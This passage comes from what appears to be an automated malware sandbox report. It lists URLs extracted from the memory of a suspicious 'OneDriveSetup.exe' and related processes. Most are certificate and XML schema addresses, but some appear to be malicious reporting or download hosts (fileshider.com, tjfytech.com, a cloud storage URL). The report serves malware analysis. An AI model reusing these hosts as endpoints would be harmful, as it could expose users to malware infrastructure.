00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pss.bdstatic.com/r/www/cache/static/global/img/pc_direct_42d6311.png)
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pss.bdstatic.com/r/www/cache/static/home/img/icons_0c37e9b.png);background-image:url(http://p
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s.fileshider.com/report?pid=
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s.fileshider.com/url3?pid=
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                Source: Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s.tjfytech.com/report?pid=
                Source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://schemas.fontawesome.io/icons/
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/claims/EmailAddressNhttp://schemas.xmlsoap.org/claims/GroupJhttp://schema
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressingzhttp://docs.oasis-open.org/ws-sx/ws-secureconversat
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/mex
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/transfer/Getthttp://schemas.xmlsoap.org/ws/2004/09/transfer/Ge
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scXhttp://schemas.xmlsoap.org/ws/2005/02/sc/sct
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/CancelT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuelhttp://schemas.xmlsoap.org/ws/2005/02/trust/RS
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/ValidateT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancel
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/CancelT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelmhttp://schemas.xmlsoap.org/ws/2005/02/trust/
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Renew
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/RenewT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RST
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validate
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trus
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateq
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/ws-trust.xsd
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributename
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/displayname
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/format
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/namequalifier
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/spnamequalifier
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/spprovidedid
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/country
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirth
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsshttp://schemas.xmlsoap.org/ws/2005/05/iden
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/gender
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephone
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1800069365.0000000005011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcode
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifier
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierrhttp://schemas.xmlso
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/sid
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress#StreetAddressText
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprint
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/urishttp://schemas.xmlsoap.org/ws/2005/05/iden
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpage
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname_urn:oasis:names:tc:xacml
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2007/01/identity
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actor
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://tests/draggableconsole.logMainContextImpl::QuitingMainContextImpl::rootWin-
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1646939143.000000000273B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://wpfanimatedgif.codeplex.com
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/Date:
                Source: svchost.exe, 00000002.00000002.1371719781.000001DA23813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: bin.exe, 00000017.00000003.1513635861.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.hardcodet.net/taskbar
                Source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xmlspy.com)
                Source: bin.exe, 00000017.00000003.1959623019.0000000000575000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1416309592.000000000273F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/s5eizipo-1
                Source: bin.exe, 00000017.00000003.1959623019.0000000000575000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1416309592.000000000273F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/zpbo7ig1https://1wm27s.onelink.me/DPiD/s5eizipoopen
                Source: bin.exe, 00000017.00000003.1959623019.0000000000575000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1416309592.000000000273F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/zpbo7ig1open
                Source: powershell.exe, 00000019.00000002.1799365817.0000000003380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aa-1348336590.cos.ap-hongkong.myqcloud.
